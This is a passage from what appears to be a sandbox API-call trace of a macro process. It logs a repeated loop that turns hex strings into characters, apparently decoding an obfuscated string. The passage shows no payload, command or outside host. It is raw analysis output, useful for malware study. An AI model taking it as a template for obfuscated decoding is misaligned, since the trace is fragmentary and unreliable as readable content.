GetUserDefaultLCID () returned 0x409 [0174.947] malloc (_Size=0xa0) returned 0x11f50080 [0174.948] free (_Block=0x11f50080) [0174.948] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.948] GetUserDefaultLCID () returned 0x409 [0174.948] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.948] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.948] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.948] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.949] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.949] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.949] GetUserDefaultLCID () returned 0x409 [0174.949] malloc (_Size=0xa0) returned 0x11f50080 [0174.949] free (_Block=0x11f50080) [0174.949] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.950] GetUserDefaultLCID () returned 0x409 [0174.950] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.951] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.951] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.951] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.951] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.951] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.951] GetUserDefaultLCID () returned 0x409 [0174.951] malloc (_Size=0xa0) returned 0x11f50080 [0174.951] free (_Block=0x11f50080) [0174.952] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.952] GetUserDefaultLCID () returned 0x409 [0174.952] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.952] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.952] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.952] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.952] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.952] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.952] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.952] GetUserDefaultLCID () returned 0x409 [0174.952] malloc (_Size=0xa0) returned 0x11f50080 [0174.953] free (_Block=0x11f50080) [0174.953] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.953] GetUserDefaultLCID () returned 0x409 [0174.953] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.953] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.953] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.953] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.954] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.954] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.954] GetUserDefaultLCID () returned 0x409 [0174.954] malloc (_Size=0xa0) returned 0x11f50080 [0174.954] free (_Block=0x11f50080) [0174.954] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.954] GetUserDefaultLCID () returned 0x409 [0174.954] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.954] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.955] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.955] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.955] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.955] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.955] GetUserDefaultLCID () returned 0x409 [0174.955] malloc (_Size=0xa0) returned 0x11f50080 [0174.955] free (_Block=0x11f50080) [0174.955] VarBstrCat (in: bstrLeft="&H", bstrRight="9b", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.955] GetUserDefaultLCID () returned 0x409 [0174.955] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.956] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.956] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.956] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.956] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.956] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.956] GetUserDefaultLCID () returned 0x409 [0174.956] malloc (_Size=0xa0) returned 0x11f50080 [0174.956] free (_Block=0x11f50080) [0174.956] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.956] GetUserDefaultLCID () returned 0x409 [0174.957] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.957] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.957] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.957] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.957] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.957] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.957] GetUserDefaultLCID () returned 0x409 [0174.957] malloc (_Size=0xa0) returned 0x11f50080 [0174.957] free (_Block=0x11f50080) [0174.958] VarBstrCat (in: bstrLeft="&H", bstrRight="97", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.958] GetUserDefaultLCID () returned 0x409 [0174.958] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.958] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.958] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.958] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.958] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.958] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.958] GetUserDefaultLCID () returned 0x409 [0174.958] malloc (_Size=0xa0) returned 0x11f50080 [0174.958] free (_Block=0x11f50080) [0174.959] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.959] GetUserDefaultLCID () returned 0x409 [0174.959] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.959] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.959] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.959] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.959] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.959] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.960] GetUserDefaultLCID () returned 0x409 [0174.960] malloc (_Size=0xa0) returned 0x11f50080 [0174.960] free (_Block=0x11f50080) [0174.960] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.960] GetUserDefaultLCID () returned 0x409 [0174.960] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.960] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.961] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.961] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.961] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.961] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.961] GetUserDefaultLCID () returned 0x409 [0174.961] malloc (_Size=0xa0) returned 0x11f50080 [0174.961] free (_Block=0x11f50080) [0174.962] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.962] GetUserDefaultLCID () returned 0x409 [0174.962] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.962] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.962] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.962] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.962] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.962] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.963] GetUserDefaultLCID () returned 0x409 [0174.963] malloc (_Size=0xa0) returned 0x11f50080 [0174.963] free (_Block=0x11f50080) [0174.963] VarBstrCat (in: bstrLeft="&H", bstrRight="b3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.963] GetUserDefaultLCID () returned 0x409 [0174.963] VarI2FromStr (in: strIn="&Hb3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.963] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0174.964] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.964] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.964] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.964] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.964] GetUserDefaultLCID () returned 0x409 [0174.964] malloc (_Size=0xa0) returned 0x11f50080 [0174.964] free (_Block=0x11f50080) [0174.964] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.965] GetUserDefaultLCID () returned 0x409 [0174.965] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.965] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.965] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.965] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.965] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.965] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.966] GetUserDefaultLCID () returned 0x409 [0174.966] malloc (_Size=0xa0) returned 0x11f50080 [0174.966] free (_Block=0x11f50080) [0174.966] VarBstrCat (in: bstrLeft="&H", bstrRight="aa", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.966] GetUserDefaultLCID () returned 0x409 [0174.966] VarI2FromStr (in: strIn="&Haa", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.966] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0174.967] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.967] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.967] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.967] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.967] GetUserDefaultLCID () returned 0x409 [0174.967] malloc (_Size=0xa0) returned 0x11f50080 [0174.967] free (_Block=0x11f50080) [0174.967] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.967] GetUserDefaultLCID () returned 0x409 [0174.968] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.968] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.968] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.968] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.968] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.968] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.968] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.968] GetUserDefaultLCID () returned 0x409 [0174.968] malloc (_Size=0xa0) returned 0x11f50080 [0174.968] free (_Block=0x11f50080) [0174.969] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.969] GetUserDefaultLCID () returned 0x409 [0174.969] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.969] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.969] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.969] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.969] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.969] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.969] GetUserDefaultLCID () returned 0x409 [0174.969] malloc (_Size=0xa0) returned 0x11f50080 [0174.970] free (_Block=0x11f50080) [0174.970] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.970] GetUserDefaultLCID () returned 0x409 [0174.970] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.970] 